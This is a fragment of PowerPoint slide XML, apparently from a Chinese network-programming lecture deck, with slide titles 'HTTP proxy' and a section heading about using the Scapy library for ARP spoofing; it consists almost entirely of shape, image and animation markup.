                                    <p:animMotion origin="layout" path="M 0.01029 2.22222E-6 L -0.09674 2.22222E-6 " pathEditMode="relative" rAng="0" ptsTypes="AA">
                                      <p:cBhvr>
                                        <p:cTn id="8" dur="750" spd="-100000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="36"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:rCtr x="-5352" y="0"/>
                                    </p:animMotion>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="9" presetID="35" presetClass="path" presetSubtype="0" accel="40000" decel="40000" fill="hold" grpId="2" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="750"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animMotion origin="layout" path="M 0.01094 2.22222E-6 L -2.5E-6 2.22222E-6 " pathEditMode="relative" rAng="0" ptsTypes="AA">
                                      <p:cBhvr>
                                        <p:cTn id="10" dur="750" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="36"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:rCtr x="-547" y="0"/>
                                    </p:animMotion>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35" presetClass="path" presetSubtype="0" decel="40000" fill="hold" grpId="1" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animMotion origin="layout" path="M 0.01029 2.22222E-6 L -0.09674 2.22222E-6 " pathEditMode="relative" rAng="0" ptsTypes="AA">
                                      <p:cBhvr>
                                        <p:cTn id="14" dur="750" spd="-100000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="5"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:rCtr x="-5352" y="0"/>
                                    </p:animMotion>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="15" presetID="35" presetClass="path" presetSubtype="0" accel="40000" decel="40000" fill="hold" grpId="2" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="750"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animMotion origin="layout" path="M 0.01094 2.22222E-6 L -2.5E-6 2.22222E-6 " pathEditMode="relative" rAng="0" ptsTypes="AA">
                                      <p:cBhvr>
                                        <p:cTn id="16" dur="750" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="5"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:rCtr x="-547" y="0"/>
                                    </p:animMotion>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P spid="36" grpId="2"/>
      <p:bldP spid="5" grpId="0"/>
      <p:bldP spid="5" grpId="1"/>
      <p:bldP spid="5" grpId="2"/>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71450" y="1891030"/>
            <a:ext cx="4358640" cy="2190115"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="图片 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4974590" y="566420"/>
            <a:ext cx="6689725" cy="5429885"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="36" name="文本框 35"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="652769" y="391945"/>
            <a:ext cx="2595152" cy="579120"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" b="1" dirty="0" smtClean="0">
                <a:blipFill>
                  <a:blip r:embed="rId3"/>
                  <a:stretch>
                    <a:fillRect/>
                  </a:stretch>
                </a:blipFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>HTTP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" b="1" dirty="0" smtClean="0">
                <a:blipFill>
                  <a:blip r:embed="rId3"/>
                  <a:stretch>
                    <a:fillRect/>
                  </a:stretch>
                </a:blipFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>代理</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="3200" b="1" dirty="0" smtClean="0">
              <a:blipFill>
                <a:blip r:embed="rId3"/>
                <a:stretch>
                  <a:fillRect/>
                </a:stretch>
              </a:blipFill>
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
    <mc:Choice xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" Requires="p14">
      <p:transition p14:dur="9"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35" presetClass="path" presetSubtype="0" decel="40000" fill="hold" grpId="1" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animMotion origin="layout" path="M 0.01029 2.22222E-6 L -0.09674 2.22222E-6 " pathEditMode="relative" rAng="0" ptsTypes="AA">
                                      <p:cBhvr>
                                        <p:cTn id="8" dur="750" spd="-100000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="36"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:rCtr x="-5352" y="0"/>
                                    </p:animMotion>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="9" presetID="35" presetClass="path" presetSubtype="0" accel="40000" decel="40000" fill="hold" grpId="2" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="750"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animMotion origin="layout" path="M 0.01094 2.22222E-6 L -2.5E-6 2.22222E-6 " pathEditMode="relative" rAng="0" ptsTypes="AA">
                                      <p:cBhvr>
                                        <p:cTn id="10" dur="750" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="36"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:rCtr x="-54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P spid="36" grpId="2"/>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3519805" y="1814830"/>
            <a:ext cx="5152390" cy="3228340"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="图片 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-266700" y="-57785"/>
            <a:ext cx="12466955" cy="67621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4"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="13" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="4"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="1+ppt_h/2"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="14" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="499"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="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59048" y="190825"/>
            <a:ext cx="4502332" cy="5806440"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="ctr">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="25000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>3</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="25000" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp useBgFill="1">
        <p:nvSpPr>
          <p:cNvPr id="10" name="矩形 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3607711" y="294873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smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:effectLst>
                <a:innerShdw blurRad="63500" dist="50800" dir="16200000">
                  <a:prstClr val="black">
                    <a:alpha val="30000"/>
                  </a:prstClr>
                </a:innerShdw>
              </a:effectLst>
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="文本框 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4681006" y="3499305"/>
            <a:ext cx="5859994" cy="1358900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>介绍</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Scapy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>库，实现</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>ARP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>地址欺骗功能</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="3200" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Freeform 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="1335838">
            <a:off x="9471801" y="2622912"/>
            <a:ext cx="672608" cy="674134"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 250 w 744"/>
              <a:gd name="T1" fmla="*/ 0 h 745"/>
              <a:gd name="T2" fmla="*/ 220 w 744"/>
              <a:gd name="T3" fmla="*/ 6 h 745"/>
              <a:gd name="T4" fmla="*/ 125 w 744"/>
              <a:gd name="T5" fmla="*/ 126 h 745"/>
              <a:gd name="T6" fmla="*/ 5 w 744"/>
              <a:gd name="T7" fmla="*/ 221 h 745"/>
              <a:gd name="T8" fmla="*/ 0 w 744"/>
              <a:gd name="T9" fmla="*/ 249 h 745"/>
              <a:gd name="T10" fmla="*/ 23 w 744"/>
              <a:gd name="T11" fmla="*/ 372 h 745"/>
              <a:gd name="T12" fmla="*/ 23 w 744"/>
              <a:gd name="T13" fmla="*/ 372 h 745"/>
              <a:gd name="T14" fmla="*/ 23 w 744"/>
              <a:gd name="T15" fmla="*/ 372 h 745"/>
              <a:gd name="T16" fmla="*/ 0 w 744"/>
              <a:gd name="T17" fmla="*/ 494 h 745"/>
              <a:gd name="T18" fmla="*/ 5 w 744"/>
              <a:gd name="T19" fmla="*/ 524 h 745"/>
              <a:gd name="T20" fmla="*/ 125 w 744"/>
              <a:gd name="T21" fmla="*/ 619 h 745"/>
              <a:gd name="T22" fmla="*/ 220 w 744"/>
              <a:gd name="T23" fmla="*/ 739 h 745"/>
              <a:gd name="T24" fmla="*/ 249 w 744"/>
              <a:gd name="T25" fmla="*/ 744 h 745"/>
              <a:gd name="T26" fmla="*/ 310 w 744"/>
              <a:gd name="T27" fmla="*/ 733 h 745"/>
              <a:gd name="T28" fmla="*/ 372 w 744"/>
              <a:gd name="T29" fmla="*/ 721 h 745"/>
              <a:gd name="T30" fmla="*/ 372 w 744"/>
              <a:gd name="T31" fmla="*/ 721 h 745"/>
              <a:gd name="T32" fmla="*/ 494 w 744"/>
              <a:gd name="T33" fmla="*/ 745 h 745"/>
              <a:gd name="T34" fmla="*/ 524 w 744"/>
              <a:gd name="T35" fmla="*/ 739 h 745"/>
              <a:gd name="T36" fmla="*/ 619 w 744"/>
              <a:gd name="T37" fmla="*/ 619 h 745"/>
              <a:gd name="T38" fmla="*/ 739 w 744"/>
              <a:gd name="T39" fmla="*/ 524 h 745"/>
              <a:gd name="T40" fmla="*/ 744 w 744"/>
              <a:gd name="T41" fmla="*/ 496 h 745"/>
              <a:gd name="T42" fmla="*/ 721 w 744"/>
              <a:gd name="T43" fmla="*/ 372 h 745"/>
              <a:gd name="T44" fmla="*/ 721 w 744"/>
              <a:gd name="T45" fmla="*/ 372 h 745"/>
              <a:gd name="T46" fmla="*/ 721 w 744"/>
              <a:gd name="T47" fmla="*/ 372 h 745"/>
              <a:gd name="T48" fmla="*/ 744 w 744"/>
              <a:gd name="T49" fmla="*/ 251 h 745"/>
              <a:gd name="T50" fmla="*/ 739 w 744"/>
              <a:gd name="T51" fmla="*/ 221 h 745"/>
              <a:gd name="T52" fmla="*/ 619 w 744"/>
              <a:gd name="T53" fmla="*/ 126 h 745"/>
              <a:gd name="T54" fmla="*/ 524 w 744"/>
              <a:gd name="T55" fmla="*/ 6 h 745"/>
              <a:gd name="T56" fmla="*/ 495 w 744"/>
              <a:gd name="T57" fmla="*/ 0 h 745"/>
              <a:gd name="T58" fmla="*/ 433 w 744"/>
              <a:gd name="T59" fmla="*/ 12 h 745"/>
              <a:gd name="T60" fmla="*/ 372 w 744"/>
              <a:gd name="T61" fmla="*/ 24 h 745"/>
              <a:gd name="T62" fmla="*/ 372 w 744"/>
              <a:gd name="T63" fmla="*/ 24 h 745"/>
              <a:gd name="T64" fmla="*/ 250 w 744"/>
              <a:gd name="T65" fmla="*/ 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4" h="745">
                <a:moveTo>
                  <a:pt x="250" y="0"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="240" y="0"/>
                  <a:pt x="230" y="2"/>
                  <a:pt x="220" y="6"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="173" y="25"/>
                  <a:pt x="159" y="92"/>
                  <a:pt x="125" y="126"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="90" y="161"/>
                  <a:pt x="24" y="176"/>
                  <a:pt x="5" y="221"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1" y="230"/>
                  <a:pt x="0" y="239"/>
                  <a:pt x="0" y="249"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="289"/>
                  <a:pt x="23" y="333"/>
                  <a:pt x="23" y="372"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="23" y="372"/>
                  <a:pt x="23" y="372"/>
                  <a:pt x="23" y="372"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="23" y="372"/>
                  <a:pt x="23" y="372"/>
                  <a:pt x="23" y="372"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="23" y="410"/>
                  <a:pt x="0" y="454"/>
                  <a:pt x="0" y="494"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="505"/>
                  <a:pt x="1" y="515"/>
                  <a:pt x="5" y="524"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="25" y="571"/>
                  <a:pt x="91" y="586"/>
                  <a:pt x="125" y="619"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="160" y="654"/>
                  <a:pt x="175" y="721"/>
                  <a:pt x="220" y="739"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="229" y="743"/>
                  <a:pt x="239" y="744"/>
                  <a:pt x="249" y="744"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="268" y="744"/>
                  <a:pt x="289" y="739"/>
                  <a:pt x="310" y="733"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="331" y="727"/>
                  <a:pt x="352" y="721"/>
                  <a:pt x="372" y="721"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="372" y="721"/>
                  <a:pt x="372" y="721"/>
                  <a:pt x="372" y="721"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="410" y="721"/>
                  <a:pt x="454" y="745"/>
                  <a:pt x="494" y="745"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="504" y="745"/>
                  <a:pt x="514" y="743"/>
                  <a:pt x="524" y="739"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="571" y="720"/>
                  <a:pt x="585" y="653"/>
                  <a:pt x="619" y="619"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="653" y="584"/>
                  <a:pt x="720" y="569"/>
                  <a:pt x="739" y="524"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="742" y="515"/>
                  <a:pt x="744" y="506"/>
                  <a:pt x="744" y="496"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="744" y="456"/>
                  <a:pt x="721" y="412"/>
                  <a:pt x="721" y="372"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="721" y="372"/>
                  <a:pt x="721" y="372"/>
                  <a:pt x="721" y="372"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="721" y="372"/>
                  <a:pt x="721" y="372"/>
                  <a:pt x="721" y="372"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="721" y="335"/>
                  <a:pt x="744" y="291"/>
                  <a:pt x="744" y="251"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="744" y="240"/>
                  <a:pt x="743" y="230"/>
                  <a:pt x="739" y="221"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="719" y="174"/>
                  <a:pt x="652" y="159"/>
                  <a:pt x="619" y="126"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="584" y="91"/>
                  <a:pt x="569" y="24"/>
                  <a:pt x="524" y="6"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="515" y="2"/>
                  <a:pt x="505" y="0"/>
                  <a:pt x="495" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="475" y="0"/>
                  <a:pt x="454" y="6"/>
                  <a:pt x="433" y="12"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="413" y="18"/>
                  <a:pt x="392" y="24"/>
                  <a:pt x="372" y="24"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="372" y="24"/>
                  <a:pt x="372" y="24"/>
                  <a:pt x="372" y="24"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="334" y="24"/>
                  <a:pt x="290" y="0"/>
                  <a:pt x="250" y="0"/>
                </a:cubicBezTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:gradFill flip="none" rotWithShape="1">
            <a:gsLst>
              <a:gs pos="50000">
                <a:schemeClr val="bg1">
                  <a:lumMod val="95000"/>
                  <a:alpha val="90000"/>
                </a:schemeClr>
              </a:gs>
              <a:gs pos="0">
                <a:schemeClr val="bg1">
                  <a:lumMod val="100000"/>
                  <a:alpha val="95000"/>
                </a:schemeClr>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="BFBFBF">
                  <a:alpha val="80000"/>
                </a:srgbClr>
              </a:gs>
            </a:gsLst>
            <a:path path="circle">
              <a:fillToRect t="100000" r="100000"/>
            </a:path>
            <a:tileRect l="-100000" b="-100000"/>
          </a:gradFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="bg1"/>
            </a:solidFill>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="571500" dist="508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endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Freeform 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="9507010" y="2658225"/>
            <a:ext cx="602190" cy="603506"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 753 w 772"/>
              <a:gd name="T1" fmla="*/ 235 h 773"/>
              <a:gd name="T2" fmla="*/ 735 w 772"/>
              <a:gd name="T3" fmla="*/ 386 h 773"/>
              <a:gd name="T4" fmla="*/ 753 w 772"/>
              <a:gd name="T5" fmla="*/ 538 h 773"/>
              <a:gd name="T6" fmla="*/ 633 w 772"/>
              <a:gd name="T7" fmla="*/ 633 h 773"/>
              <a:gd name="T8" fmla="*/ 538 w 772"/>
              <a:gd name="T9" fmla="*/ 753 h 773"/>
              <a:gd name="T10" fmla="*/ 386 w 772"/>
              <a:gd name="T11" fmla="*/ 735 h 773"/>
              <a:gd name="T12" fmla="*/ 324 w 772"/>
              <a:gd name="T13" fmla="*/ 747 h 773"/>
              <a:gd name="T14" fmla="*/ 234 w 772"/>
              <a:gd name="T15" fmla="*/ 753 h 773"/>
              <a:gd name="T16" fmla="*/ 139 w 772"/>
              <a:gd name="T17" fmla="*/ 633 h 773"/>
              <a:gd name="T18" fmla="*/ 19 w 772"/>
              <a:gd name="T19" fmla="*/ 538 h 773"/>
              <a:gd name="T20" fmla="*/ 37 w 772"/>
              <a:gd name="T21" fmla="*/ 386 h 773"/>
              <a:gd name="T22" fmla="*/ 19 w 772"/>
              <a:gd name="T23" fmla="*/ 235 h 773"/>
              <a:gd name="T24" fmla="*/ 139 w 772"/>
              <a:gd name="T25" fmla="*/ 140 h 773"/>
              <a:gd name="T26" fmla="*/ 234 w 772"/>
              <a:gd name="T27" fmla="*/ 20 h 773"/>
              <a:gd name="T28" fmla="*/ 386 w 772"/>
              <a:gd name="T29" fmla="*/ 38 h 773"/>
              <a:gd name="T30" fmla="*/ 447 w 772"/>
              <a:gd name="T31" fmla="*/ 26 h 773"/>
              <a:gd name="T32" fmla="*/ 538 w 772"/>
              <a:gd name="T33" fmla="*/ 20 h 773"/>
              <a:gd name="T34" fmla="*/ 633 w 772"/>
              <a:gd name="T35" fmla="*/ 140 h 773"/>
              <a:gd name="T36" fmla="*/ 753 w 772"/>
              <a:gd name="T37" fmla="*/ 235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2" h="773">
                <a:moveTo>
                  <a:pt x="753" y="235"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="772" y="281"/>
                  <a:pt x="735" y="339"/>
                  <a:pt x="735" y="386"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="735" y="436"/>
                  <a:pt x="771" y="493"/>
                  <a:pt x="753" y="538"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="734" y="583"/>
                  <a:pt x="667" y="598"/>
                  <a:pt x="633" y="633"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="599" y="667"/>
                  <a:pt x="585" y="734"/>
                  <a:pt x="538" y="753"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="491" y="773"/>
                  <a:pt x="434" y="735"/>
                  <a:pt x="386" y="735"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="366" y="735"/>
                  <a:pt x="345" y="741"/>
                  <a:pt x="324" y="747"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="293" y="756"/>
                  <a:pt x="261" y="764"/>
                  <a:pt x="234" y="753"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="189" y="735"/>
                  <a:pt x="174" y="668"/>
                  <a:pt x="139" y="633"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="105" y="600"/>
                  <a:pt x="39" y="585"/>
                  <a:pt x="19" y="538"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="492"/>
                  <a:pt x="37" y="434"/>
                  <a:pt x="37" y="386"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="37" y="337"/>
                  <a:pt x="1" y="279"/>
                  <a:pt x="19" y="235"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="38" y="190"/>
                  <a:pt x="104" y="175"/>
                  <a:pt x="139" y="140"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="173" y="106"/>
                  <a:pt x="187" y="39"/>
                  <a:pt x="234" y="20"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="281" y="0"/>
                  <a:pt x="338" y="38"/>
                  <a:pt x="386" y="38"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="406" y="38"/>
                  <a:pt x="427" y="32"/>
                  <a:pt x="447" y="26"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="479" y="17"/>
                  <a:pt x="511" y="9"/>
                  <a:pt x="538" y="20"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="583" y="38"/>
                  <a:pt x="598" y="105"/>
                  <a:pt x="633" y="140"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="666" y="173"/>
                  <a:pt x="733" y="188"/>
                  <a:pt x="753" y="235"/>
                </a:cubicBezTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
